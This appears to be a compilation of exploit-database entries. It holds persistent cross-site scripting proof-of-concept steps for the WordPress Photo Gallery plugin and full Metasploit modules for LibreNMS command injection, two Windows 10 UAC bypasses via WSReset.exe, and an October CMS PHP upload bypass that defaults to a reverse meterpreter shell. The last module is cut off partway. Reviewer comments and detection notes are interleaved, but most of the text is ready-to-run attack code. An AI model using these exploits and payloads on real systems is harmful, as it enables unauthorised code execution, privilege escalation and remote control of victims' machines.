Vulnerability Reported 09-03-2019 - Vendor responded 09-04-2019 - New version released (1.5.35) 09-10-2019 - Full Disclosure # References: https://wordpress.org/plugins/photo-gallery/#developers https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/controllers/Albumsgalleries.php?old=1845136&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fcontrollers%2FAlbumsgalleries.php https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16119
-
WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting
# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Persistent Cross Site Scripting # inurl:"\wp-content\plugins\photo-gallery" # Date: 09-10-2019 # Exploit Author: MTK (http://mtk911.cf/) # Vendor Homepage: https://10web.io/ # Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip # Version: Up to v1.5.34 # Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows # CVE : 2019-16117 # Software description: Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes. # Technical Details & Impact: XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. # POC 1. In Add Gallery/Images tab 2. Edit current image gallery 3. In Alt/Title or Description text area add XSS payload e.g; <script>alert(1);</script> 4. Click Save and preview. 5. It will show pop-up confirming existence of XSS vulnerability # Timeline 09-01-2019 - Vulnerability Reported 09-03-2019 - Vendor responded 09-04-2019 - New version released (1.5.35) 09-10-2019 - Full Disclosure # References: https://wordpress.org/plugins/photo-gallery/#developers https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/models/Galleries.php?old=2135029&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fmodels%2FGalleries.php https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16117
-
WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting (2)
# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Persistent Cross Site Scripting # inurl:"\wp-content\plugins\photo-gallery" # Date: 09-10-2019 # Exploit Author: MTK (http://mtk911.cf/) # Vendor Homepage: https://10web.io/ # Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip # Version: Up to v1.5.34 # Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows # CVE : 2019-16118 # Software description: Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes. # Technical Details & Impact: XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. # POC 1. Go to options tab select watermark tab 2. Select text as watermark type 3. Add watermark text as XSS payload e.g; "'><img src=a onerror='alert(2);' 4. Click Save. 5. It will show pop-up confirming existence of XSS vulnerability # Timeline 09-01-2019 - Vulnerability Reported 09-03-2019 - Vendor responded 09-04-2019 - New version released (1.5.35) 09-10-2019 - Full Disclosure # References: https://wordpress.org/plugins/photo-gallery/#developers https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/controllers/Options.php?old=2142624&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fcontrollers%2FOptions.php https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/js/bwg.js?old=2135029&old_path=photo-gallery%2Ftrunk%2Fjs%2Fbwg.js https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16118
-
LibreNMS - Collectd Command Injection (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Authenticated command injection in LibreNMS's collectd graph endpoint
# (graph.php, CVE-2019-10669). Flow: log in with the supplied credentials,
# enumerate device ids, find a device that exposes a collectd plugin, then
# request a graph whose `from` parameter carries the payload inside backticks.
# Defender notes: the injection point is the `from`/`to` query parameters of
# graph.php (see Description), so backticks or other shell metacharacters in
# those parameters are a cheap detection signature; check() below treats
# releases up to and including 1.50 as affected.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'LibreNMS Collectd Command Injection',
      'Description'    => %q(
        This module exploits a command injection vulnerability in the Collectd graphing
        functionality in LibreNMS. The `to` and `from` parameters used to define the range
        for a graph are sanitized using the `mysqli_escape_real_string()` function, which
        permits backticks. These parameters are used as part of a shell command that gets
        executed via the `passthru()` function, which can result in code execution.
      ),
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Eldar Marcussen',  # Vulnerability discovery
          'Shelby Pace'       # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2019-10669' ],
          [ 'URL', 'https://www.darkmatter.ae/xen1thlabs/librenms-command-injection-vulnerability-xl-19-017/' ]
        ],
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          [ 'Linux',
            {
              'Platform'       => 'unix',
              'Arch'           => ARCH_CMD,
              'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse' }
            }
          ]
        ],
      'DisclosureDate' => '2019-07-15',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Base LibreNMS path', '/' ]),
        OptString.new('USERNAME', [ true, 'User name for LibreNMS', '' ]),
        OptString.new('PASSWORD', [ true, 'Password for LibreNMS', '' ])
      ])
  end

  # Unauthenticated version probe: looks for "librenms" on the landing page,
  # then parses the version string out of pages/about.inc.php.
  # Returns Safe / Detected / Appears as a CheckCode.
  def check
    res = send_request_cgi!('method' => 'GET', 'uri' => target_uri.path)
    return Exploit::CheckCode::Safe unless res && res.body.downcase.include?('librenms')

    about_res = send_request_cgi(
      'method'  =>  'GET',
      'uri'     =>  normalize_uri(target_uri.path, 'pages', 'about.inc.php')
    )
    return Exploit::CheckCode::Detected unless about_res && about_res.code == 200

    version = about_res.body.match(/version\s+to\s+(\d+\.\d+\.?\d*)/)
    return Exploit::CheckCode::Detected unless version && version.length > 1
    vprint_status("LibreNMS version #{version[1]} detected")

    version = Gem::Version.new(version[1])
    # NOTE(review): when the parsed version is newer than 1.50 this method
    # falls off the end and returns nil instead of a CheckCode (Safe would be
    # the expected value); callers comparing against CheckCode constants get
    # nil rather than a proper result.
    return Exploit::CheckCode::Appears if version <= Gem::Version.new('1.50')
  end

  # Logs in with USERNAME/PASSWORD and returns the post-login cookie string.
  # Fails the module (NotFound / NoAccess) on any unexpected step; success is
  # judged by the redirect on POST and by "Devices" appearing on the landing page.
  def login
    login_uri = normalize_uri(target_uri.path, 'login')
    res = send_request_cgi('method' => 'GET', 'uri' => login_uri)
    fail_with(Failure::NotFound, 'Failed to access the login page') unless res && res.code == 200

    cookies = res.get_cookies
    login_res = send_request_cgi(
      'method'    =>  'POST',
      'uri'       =>  login_uri,
      'cookie'    =>  cookies,
      'vars_post' =>
      {
        'username'  =>  datastore['USERNAME'],
        'password'  =>  datastore['PASSWORD']
      }
    )
    fail_with(Failure::NoAccess, 'Failed to submit credentials to login page') unless login_res && login_res.code == 302

    cookies = login_res.get_cookies
    res = send_request_cgi(
      'method'  =>  'GET',
      'uri'     =>  normalize_uri(target_uri.path),
      'cookie'  =>  cookies
    )
    fail_with(Failure::NoAccess, 'Failed to log into LibreNMS') unless res && res.code == 200 && res.body.include?('Devices')

    print_status('Successfully logged into LibreNMS. Storing credentials...')
    store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
    login_res.get_cookies
  end

  # Authenticated version lookup from the /about page (needs @cookies).
  # Returns the first "x.y[.z]" match found in the table links, or nil when
  # none of the anchors contains one (the each loop then yields nil).
  def get_version
    uri = normalize_uri(target_uri.path, 'about')
    res = send_request_cgi(
      'method'  =>  'GET',
      'uri'     =>  uri,
      'cookie'  =>  @cookies
    )
    fail_with(Failure::NotFound, 'Failed to reach the about LibreNMS page') unless res && res.code == 200

    html = res.get_html_document
    version = html.search('tr//td//a')
    fail_with(Failure::NotFound, 'Failed to retrieve version information') if version.empty?

    version.each do |e|
      return $1 if e.text =~ /(\d+\.\d+\.?\d*)/
    end
  end

  # Lists device ids via the devices table endpoint. The endpoint and the
  # `format` value differ for releases before 1.50, hence the version branch.
  # Returns an array of id strings; fails the module when none are found.
  def get_device_ids
    version = get_version
    print_status("LibreNMS version: #{version}")

    if version && Gem::Version.new(version) < Gem::Version.new('1.50')
      dev_uri = normalize_uri(target_uri.path, 'ajax_table.php')
      format = '+list_detail'
    else
      dev_uri = normalize_uri(target_uri.path, 'ajax', 'table', 'device')
      format = 'list_detail'
    end

    dev_res = send_request_cgi(
      'method'    =>  'POST',
      'uri'       =>  dev_uri,
      'cookie'    =>  @cookies,
      'vars_post' =>
      {
        'id'              =>  'devices',
        'format'          =>  format,
        'current'         =>  '1',
        'sort[hostname]'  =>  'asc',
        'rowCount'        =>  50
      }
    )
    fail_with(Failure::NotFound, 'Failed to access the devices page') unless dev_res && dev_res.code == 200

    # NOTE(review): JSON.parse raises on a non-JSON body, and json['rows'] may
    # be nil (then .empty? raises NoMethodError); neither case is handled here.
    json = JSON.parse(dev_res.body)
    fail_with(Failure::NotFound, 'Unable to retrieve JSON response') if json.empty?

    json = json['rows']
    fail_with(Failure::NotFound, 'Unable to find hostname data') if json.empty?

    hosts = []
    json.each do |row|
      hostname = row['hostname']
      next if hostname.nil?
      # The hostname cell is HTML; the device id is taken from its link target.
      id = hostname.match('href=\"device\/device=(\d+)\/')
      next unless id && id.length > 1
      hosts << id[1]
    end
    fail_with(Failure::NotFound, 'Failed to retrieve any device ids') if hosts.empty?
    hosts
  end

  # Reads the first collectd plugin link on a device's collectd tab and splits
  # its "key=value" path segments into the four graph parameters.
  # Returns [c_plugin, c_type, c_plugin_instance, c_type_instance], or nil when
  # the page or the link is missing. The two *_instance values default to ''
  # (truthy in Ruby), so effectively only c_plugin and c_type decide the
  # break condition in #exploit.
  def get_plugin_info(id)
    uri = normalize_uri(target_uri.path, "device", "device=#{id}", "tab=collectd")
    res = send_request_cgi(
      'method'  =>  'GET',
      'uri'     =>  uri,
      'cookie'  =>  @cookies
    )
    return unless res && res.code == 200

    html = res.get_html_document
    plugin_link = html.at('div[@class="col-md-3"]//a/@href')
    return if plugin_link.nil?
    plugin_link = plugin_link.value
    plugin_hash = Hash[plugin_link.split('/').map { |plugin_val| plugin_val.split('=') }]

    c_plugin = plugin_hash['c_plugin']
    c_type = plugin_hash['c_type']
    c_type_instance = plugin_hash['c_type_instance'] || ''
    c_plugin_instance = plugin_hash['c_plugin_instance'] || ''

    return c_plugin, c_type, c_plugin_instance, c_type_instance
  end

  # Picks the first device with collectd plugin data and requests a graph for
  # it. `from` wraps the encoded payload in backticks (the Description explains
  # why backticks survive sanitisation); `to` is just random digits.
  # The response is not inspected: a reverse payload is expected to call back.
  def exploit
    req_uri = normalize_uri(target_uri.path, 'graph.php')
    @cookies = login
    dev_ids = get_device_ids

    collectd_device = -1
    plugin_name = nil
    plugin_type = nil
    plugin_instance = nil
    plugin_type_inst = nil
    dev_ids.each do |device|
      collectd_device = device
      plugin_name, plugin_type, plugin_instance, plugin_type_inst = get_plugin_info(device)
      break if (plugin_name && plugin_type && plugin_instance && plugin_type_inst)
      collectd_device = -1
    end
    fail_with(Failure::NotFound, 'Failed to find a collectd plugin for any of the devices') if collectd_device == -1

    print_status("Sending payload via device #{collectd_device}")
    res = send_request_cgi(
      'method'    =>  'GET',
      'uri'       =>  req_uri,
      'cookie'    =>  @cookies,
      'vars_get'  =>
      {
        'device'            =>  collectd_device,
        'type'              =>  'device_collectd',
        'to'                =>  Rex::Text.rand_text_numeric(10),
        'from'              =>  "1`#{payload.encoded}`",
        'c_plugin'          =>  plugin_name,
        'c_type'            =>  plugin_type,
        'c_plugin_instance' =>  plugin_instance,
        'c_type_instance'   =>  plugin_type_inst
      }
    )
  end
end
-
Microsoft Windows 10 - UAC Protection Bypass Via Microsoft Windows Store (WSReset.exe) (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local UAC bypass: WSReset.exe carries the "autoElevate" manifest property,
# and a copy of it placed under a mock trusted directory whose name contains a
# trailing space ("C:\Windows \System32\") loads propsys.dll from that
# directory when launched (see Description and References).
# Defender notes: creation of a directory literally named "C:\Windows "
# (trailing space) or of "C:\Windows \System32\propsys.dll" is an unambiguous
# artefact. The module does not remove them (see the warning at the end of
# #exploit), so they remain on disk for forensics.
class MetasploitModule < Msf::Exploit::Local
  Rank = ManualRanking

  include Msf::Exploit::EXE
  # NOTE(review): FileDropper is included but nothing is registered for
  # cleanup; all artefacts are left behind on purpose (manual cleanup warning).
  include Msf::Exploit::FileDropper
  include Post::Windows::Priv
  include Post::Windows::Runas

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'            => 'Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)',
        'Description'     => %q{
          This module exploits a flaw in the WSReset.exe Windows Store Reset Tool.
          The tool is run with the "autoElevate" property set to true, however it
          can be moved to a new Windows directory containing a space
          (C:\Windows \System32\) where, upon execution, it will load our payload
          dll (propsys.dll).
        },
        'License'         => MSF_LICENSE,
        'Author'          => [
          'ACTIVELabs',   # discovery
          'sailay1996',   # poc
          'timwr',        # metasploit module
        ],
        'Platform'        => ['win'],
        'SessionTypes'    => ['meterpreter'],
        'Targets'         => [[ 'Automatic', {} ]],
        'DefaultTarget'   => 0,
        'DefaultOptions'  => { 'EXITFUNC' => 'process', 'WfsDelay' => 15 },
        'DisclosureDate'  => 'Aug 22 2019',
        'Notes'           => {
          'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ],
        },
        'References'      => [
          ['URL', 'https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html'],
          ['URL', 'https://github.com/sailay1996/UAC_bypass_windows_store'],
          ['URL', 'https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e'],
        ],
      )
    )
  end

  # Appears only when the OS reports Windows 10, UAC is enabled and the
  # genuine WSReset.exe exists in System32; otherwise Safe.
  def check
    if sysinfo['OS'] =~ /Windows 10/ && is_uac_enabled? && exists?("C:\\Windows\\System32\\WSReset.exe")
      return CheckCode::Appears
    end
    CheckCode::Safe
  end

  # Builds the mock "C:\Windows \System32\" tree, copies WSReset.exe into it,
  # drops the payload dll beside it as propsys.dll and launches the copy.
  # Aborts on WOW64 sessions, on a payload/target architecture mismatch and on
  # the "Always Notify" UAC levels; on DoNotPrompt it falls back to runas.
  def exploit
    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
    end

    # Make sure we have a sane payload configuration
    if sysinfo['Architecture'] != payload.arch.first
      fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target')
    end

    check_permissions!

    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
      fail_with(Failure::NotVulnerable, "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
    when UAC_DEFAULT
      print_good('UAC is set to Default')
      print_good('BypassUAC can bypass this setting, continuing...')
    when UAC_NO_PROMPT
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
      shell_execute_exe
      return
    end

    # Note the trailing space after "Windows": that is the whole trick.
    exploit_win_dir = "C:\\Windows \\"
    exploit_dir = "C:\\Windows \\System32\\"
    exploit_file = exploit_dir + "WSReset.exe"

    unless exists? exploit_win_dir
      print_status("Creating directory '#{exploit_win_dir}'...")
      session.fs.dir.mkdir(exploit_win_dir)
    end

    unless exists? exploit_dir
      print_status("Creating directory '#{exploit_dir}'...")
      session.fs.dir.mkdir(exploit_dir)
    end

    unless exists? exploit_file
      session.fs.file.copy("C:\\Windows\\System32\\WSReset.exe", exploit_file)
    end

    payload_dll = "C:\\Windows \\System32\\propsys.dll"
    print_status("Creating payload '#{payload_dll}'...")
    # NOTE(review): this local `payload` shadows the #payload method used
    # above for the architecture check; harmless here, but easy to misread.
    payload = generate_payload_dll
    write_file(payload_dll, payload)

    print_status("Executing WSReset.exe...")
    begin
      session.sys.process.execute("cmd.exe /c \"#{exploit_file}\"", nil, {'Hidden' => true})
    # NOTE(review): rescuing ::Exception also catches non-StandardError
    # exceptions such as Interrupt; StandardError would be the usual choice.
    rescue ::Exception => e
      print_error(e.to_s)
    end
    print_warning("This exploit requires manual cleanup of the '#{exploit_win_dir}' and '#{exploit_dir}' directories!")
  end

  # Pre-flight: target must check as Appears, the session must not already be
  # elevated, the user should be in the Administrators group (a nil answer
  # from whoami is tolerated with a warning) and not at Low integrity.
  def check_permissions!
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    end
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?

    # Check if you are an admin
    # is_in_admin_group can be nil, true, or false
    print_status('UAC is Enabled, checking level...')
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?
    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    else
      if admin_group
        print_good('Part of Administrators group! Continuing...')
      else
        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
      end
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end
end
-
October CMS - Upload Protection Bypass Code Execution (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Authenticated upload-filter bypass in October CMS's media manager
# (CVE-2017-1000119, EDB 41936): the extension block-list named in the
# Description apparently does not cover ".php5", so a PHP file with that
# extension is accepted and is then fetched from storage/app/media/ to run it.
# Defender notes: an allow-list of media extensions plus a web-server rule
# that never executes scripts from the media storage path removes both halves
# of this chain; a POST to backend/cms/media with the X-OCTOBER-FILEUPLOAD
# header and a non-image filename is the request to alert on.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'October CMS Upload Protection Bypass Code Execution',
      'Description'     => %q{
        This module exploits an Authenticated user with permission to upload and manage
        media contents can upload various files on the server. Application prevents the
        user from uploading PHP code by checking the file extension. It uses black-list
        based approach, as seen in octobercms/vendor/october/rain/src/Filesystem/
        Definitions.php:blockedExtensions(). This module was tested on October CMS
        version v1.0.412 on Ubuntu.
      },
      'Author'          =>
        [
          'Anti Räis', # Discovery
          'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit Module
          'SecureLayer7.net' # Metasploit Module
        ],
      'License'         => MSF_LICENSE,
      'References'      =>
        [
          ['EDB','41936'],
          ['URL','https://bitflipper.eu/finding/2017/04/october-cms-v10412-several-issues.html'],
          ['CVE','2017-1000119']
        ],
      'DefaultOptions'  =>
        {
          'SSL' => false,
          'PAYLOAD' => 'php/meterpreter/reverse_tcp',
          'ENCODER' => 'php/base64',
        },
      'Privileged'      => false,
      'Platform'        => ['php'],
      'Arch'            => ARCH_PHP,
      'Targets'         =>
        [
          [ 'October CMS v1.0.412', { } ],
        ],
      'DefaultTarget'   => 0,
      'DisclosureDate'  => 'Apr 25 2017'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base October CMS directory path", '/']),
        OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
        OptString.new('PASSWORD', [ true, "Password to authenticate with", 'admin'])
      ])
  end

  # Base path from TARGETURI.
  def uri
    return target_uri.path
  end

  # Fingerprints October CMS by the presence of a framework asset; this only
  # proves the product is there, not its version, hence Appears at most.
  def check
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(uri, 'modules', 'system', 'assets', 'js', 'framework.js')
      })
    rescue
      vprint_error('Unable to access the /assets/js/framework.js file')
      return CheckCode::Unknown
    end

    if res && res.code == 200
      return Exploit::CheckCode::Appears
    end

    return CheckCode::Safe
  end

  # Fetches the backend sign-in form, extracts its session key and CSRF token,
  # posts the credentials and returns the cookies on a 302; fails otherwise.
  def login
    res = send_request_cgi({
      'uri' => normalize_uri(uri, 'backend', 'backend', 'auth', 'signin'),
      'method' => 'GET'
    })

    if res.nil?
      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
    end

    # A regex literal with named groups on the left of =~ assigns the captures
    # to the locals `session` and `token`. NOTE(review): the character class
    # [A-Za-z0-9"] also admits the closing quote, which only works because the
    # engine backtracks to the `">` that follows.
    /name="_session_key" type="hidden" value="(?<session>[A-Za-z0-9"]+)">/ =~ res.body
    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine Session Key") if session.nil?

    /name="_token" type="hidden" value="(?<token>[A-Za-z0-9"]+)">/ =~ res.body
    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine token") if token.nil?

    vprint_good("Token for login : #{token}")
    vprint_good("Session Key for login : #{session}")

    cookies = res.get_cookies

    vprint_status('Trying to Login ......')
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, 'backend', 'backend', 'auth', 'signin'),
      'cookie' => cookies,
      'vars_post' => Hash[{
        '_session_key' => session,
        '_token' => token,
        'postback' => '1',
        'login' => datastore['USERNAME'],
        'password' => datastore['PASSWORD']
      }.to_a.shuffle]
    })

    fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?

    # if we redirect. then we assume we have authenticated cookie.
    # NOTE(review): the plaintext password is echoed to the console in both
    # branches below; store_valid_credential already records it.
    if res.code == 302
      print_good("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
      store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
      return cookies
    else
      fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]")
    end
  end

  # Uploads the PHP payload with a ".php5" name through the media manager and
  # then requests it from storage/app/media/ to execute it.
  def exploit
    cookies = login
    evil = "<?php #{payload.encoded} ?>"
    payload_name = "#{rand_text_alpha(8..13)}.php5"

    post_data = Rex::MIME::Message.new
    # The `content_type = ...` forms are plain positional arguments (Ruby
    # treats them as local assignments, not keywords).
    post_data.add_part("/", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="path"')
    # NOTE(review): the filename value is never closed with a `"`; the server
    # evidently tolerates it, but the disposition is malformed.
    post_data.add_part(evil, content_type = 'application/x-php', transfer_encoding = nil, content_disposition = "form-data; name=\"file_data\"; filename=\"#{payload_name}") #payload

    data = post_data.to_s
    # NOTE(review): only the bare filename is registered; the file is served
    # from storage/app/media/ (see the GET below), so cleanup presumably
    # misses its real location — confirm against FileDropper's semantics.
    register_files_for_cleanup(payload_name)

    vprint_status("Trying to upload malicious #{payload_name} file ....")
    # NOTE(review): the upload response is never checked before the trigger.
    res = send_request_cgi({
      'uri' => normalize_uri(uri, 'backend', 'cms', 'media'),
      'method' => 'POST',
      'cookie' => cookies,
      'headers' => {
        'X-OCTOBER-FILEUPLOAD' => 'MediaManager-manager'
      },
      'Connection' => 'close',
      'data' => data,
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
    })

    send_request_cgi({
      'uri' => normalize_uri(uri, 'storage', 'app', 'media', payload_name),
      'method' => 'GET'
    })
  end
end
-
Microsoft Windows 10 - UAC Protection Bypass Via Microsoft Windows Store (WSReset.exe) and Registry (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local UAC bypass via WSReset.exe's auto-elevation: the binary resolves a
# handler under the user-writable key
# HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command,
# so a command written there runs with the elevated token (see Description).
# Defender notes: a write to that key (an empty DelegateExecute value plus a
# default value pointing at a command under %TMP%) followed shortly by a
# WSReset.exe launch is the behavioural signature. The key is deleted about
# 20 s after launch (end of #exploit), but the payload file in %TMP% is not,
# so it survives for forensics.
class MetasploitModule < Msf::Exploit::Local
  Rank = ManualRanking

  include Msf::Exploit::EXE
  # NOTE(review): FileDropper is included but the payload file is never
  # registered; only the registry key is cleaned up (see the warning below).
  include Msf::Exploit::FileDropper
  include Post::Windows::Priv
  include Post::Windows::Runas

  def initialize(info = {})
    super(
      update_info(info,
        'Name'            => 'Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry',
        'Description'     => %q(
          This module exploits a flaw in the WSReset.exe file associated with the
          Windows Store. This binary has autoelevate privs, and it will run a binary
          file contained in a low-privilege registry location. By placing a link to
          the binary in the registry location, WSReset.exe will launch the binary
          as a privileged user.
        ),
        'License'         => MSF_LICENSE,
        'Author'          => [
          'ACTIVELabs',   # discovery
          'sailay1996',   # poc
          'bwatters-r7',  # metasploit module
        ],
        'Platform'        => ['win'],
        'SessionTypes'    => ['meterpreter'],
        'Targets'         => [[ 'Automatic', {} ]],
        'DefaultTarget'   => 0,
        'DefaultOptions'  => { 'WfsDelay' => 15 },
        'DisclosureDate'  => 'Feb 19 2019',
        'Notes'           => {
          'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
        },
        'References'      => [
          ['URL', 'https://www.activecyber.us/activelabs/windows-uac-bypass'],
          ['URL', 'https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html'],
          ['URL', 'https://github.com/sailay1996/UAC_bypass_windows_store'],
        ]
      )
    )
    register_options(
      [OptString.new('PAYLOAD_NAME', [false, 'The filename to use for the payload binary (%RAND% by default).', nil])]
    )
  end

  # Appears only when the OS reports Windows 10, UAC is enabled and
  # WSReset.exe exists in System32; otherwise Safe.
  def check
    if sysinfo['OS'] =~ /Windows 10/ && is_uac_enabled? && exists?("C:\\Windows\\System32\\WSReset.exe")
      return CheckCode::Appears
    end
    CheckCode::Safe
  end

  # Writes the handler key, drops the payload exe into %TMP%, launches
  # WSReset.exe, waits 20 s and removes the key again.
  # Aborts on the "Always Notify" UAC levels; on DoNotPrompt it falls back
  # to the runas helper instead.
  def exploit
    check_permissions!

    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
      fail_with(Failure::NotVulnerable, "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
    when UAC_DEFAULT
      print_good('UAC is set to Default')
      print_good('BypassUAC can bypass this setting, continuing...')
    when UAC_NO_PROMPT
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
      shell_execute_exe
      return
    end

    # get directory locations straight
    win_dir = session.sys.config.getenv('windir')
    vprint_status("win_dir = " + win_dir)
    tmp_dir = session.sys.config.getenv('tmp')
    vprint_status("tmp_dir = " + tmp_dir)
    exploit_dir = win_dir + "\\System32\\"
    vprint_status("exploit_dir = " + exploit_dir)
    reset_filepath = exploit_dir + "WSReset.exe"
    vprint_status("exploit_file = " + reset_filepath)

    # make payload
    # PAYLOAD_NAME wins when set; otherwise 6..13 random letters plus ".exe"
    # (`||` binds looser than `+`, so the suffix only applies to the random name).
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.exe'
    payload_pathname = tmp_dir + '\\' + payload_name
    vprint_status("payload_pathname = " + payload_pathname)
    vprint_status("Making Payload")
    payload = generate_payload_exe
    # NOTE(review): payload_pathname is not quoted inside the command; a %TMP%
    # path containing a space would presumably break the `start` call — confirm.
    reg_command = exploit_dir + "cmd.exe /c start #{payload_pathname}"
    vprint_status("reg_command = " + reg_command)
    registry_key = "HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"

    # make registry changes
    # NOTE(review): a failure here is only logged (and ::Exception is broader
    # than needed); the module still proceeds to launch WSReset.exe.
    vprint_status("Making Registry Changes")
    begin
      registry_createkey(registry_key)
      registry_setvaldata(registry_key, "DelegateExecute", '', "REG_SZ")
      registry_setvaldata(registry_key, '', reg_command, "REG_SZ")
    rescue ::Exception => e
      print_error(e.to_s)
    end
    vprint_status("Registry Changes Complete")

    # Upload payload
    vprint_status("Uploading Payload to #{payload_pathname}")
    write_file(payload_pathname, payload)
    vprint_status("Payload Upload Complete")
    vprint_status("Launching " + reset_filepath)
    begin
      session.sys.process.execute("cmd.exe /c \"#{reset_filepath}\"", nil, 'Hidden' => true)
    rescue ::Exception => e
      print_error(e.to_s)
    end
    # NOTE(review): the quote opened before the path is never closed in this message.
    print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")

    # wait for a few seconds before cleaning up
    sleep(20)
    vprint_status("Removing Registry Changes")
    registry_deletekey(registry_key)
    vprint_status("Registry Changes Removed")
  end

  # Pre-flight: target must check as Appears, the session must not already be
  # elevated, the user should be in the Administrators group (a nil answer
  # from whoami is tolerated with a warning) and not at Low integrity.
  def check_permissions!
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    end
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?

    # Check if you are an admin
    # is_in_admin_group can be nil, true, or false
    print_status('UAC is Enabled, checking level...')
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?
    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
